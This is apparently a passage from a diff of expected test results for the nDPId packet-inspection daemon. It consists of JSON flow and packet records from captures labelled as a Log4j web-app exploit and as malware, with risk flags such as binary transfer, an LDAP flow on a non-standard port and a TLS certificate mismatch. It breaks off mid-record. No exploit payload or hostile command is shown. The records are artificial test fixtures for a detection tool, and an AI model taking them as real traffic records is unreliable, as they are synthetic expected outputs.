00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","packets-captured":426,"packets-processed":422,"total-skipped-flows":0,"total-l4-data-len":5830,"total-not-detected-flows":2,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1639425834697}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 426/422

16
test/results/long_tls_certificate.pcap.out
View File

File diff suppressed because one or more lines are too long

34
test/results/malware.pcap.out
View File

@@ -8,25 +8,25 @@
00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569571470672,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569571470672,"pkt":"CGoKOl4eMFLLbJwbCABFAABU4M1AAEABCcTAqAcHkIv33AgApMYAAQABjsKNXQAAAABuRAoAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":120000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569571470672,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569571476362,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569571476362,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569571476362,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0sPtAAEAGObHAqAcHkIv33IOqAFCfbfb4AAAAAIAC+vBQPgAAAgQFtAEBBAIBAwMH"}
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":196,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1569579408876}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1569579408876,"pkt":"CGoKOl4eMFLLbJwbCABFAAFxQQlAAEAGkCXAqAcHQ9dc0r0KAFDJvdSn63fGVVAYAfZpvAAAR0VUIC8gSFRUUC8xLjENCkhvc3Q6IHd3dy5pbnRlcm5ldGJhZGd1eXMuY29tDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo2OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkROVDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KDQo="}
00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7440000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"}
00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02469{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}}
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1569579408876,"pkt":"CGoKOl4eMFLLbJwbCABFAAFxQQlAAEAGkCXAqAcHQ9dc0r0KAFDJvdSn63fGVVAYAfZpvAAAR0VUIC8gSFRUUC8xLjENCkhvc3Q6IHd3dy5pbnRlcm5ldGJhZGd1eXMuY29tDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBydjo2OC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkROVDogMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KDQo="}
00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579408876,"flow_last_seen":1569579408876,"flow_idle_time":7560000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":1,"thread_ts_msec":1569579408876,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OpenDNS","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.internetbadguys.com","url":"www.internetbadguys.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 10.0; rv:68.0) Gecko\/20100101 Firefox\/68.0"}}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569579409087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1569579409087,"pkt":"MFLLbJwbCGoKOl4eCABFAABUIjBAADgGuBtD11zSwKgHBwBQvQrrd8wJyb3V8FAYAO11CAAALDXKuXRPxt9F45TTtQ17T177PqBz\/8Tm+6YgbZe0R+XFq38BUlr3UR8MAAA="}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569579416636,"flow_last_seen":1569579416636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579416636,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569579416636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416636,"pkt":"CGoKOl4eMFLLbJwbCABFAAA0xe5AAEAGDH3AqAcHQ9dc0omkAbvdSlrrAAAAAIAC+vBofwAAAgQFtAEBBAIBAwMH"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569579416828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569579416828,"pkt":"MFLLbJwbCGoKOl4eCABFAAA0AABAADgG2mtD11zSwKgHBwG7iaQdaco+3Upa7IASchDpWQAAAgQFtAEBBAIBAwMH"}
00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569579416828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569579416828,"pkt":"CGoKOl4eMFLLbJwbCABFAAAoxe9AAEAGDIjAqAcHQ9dc0omkAbvdSlrsHWnKP1AQAfZocwAA"}
00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02469{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": 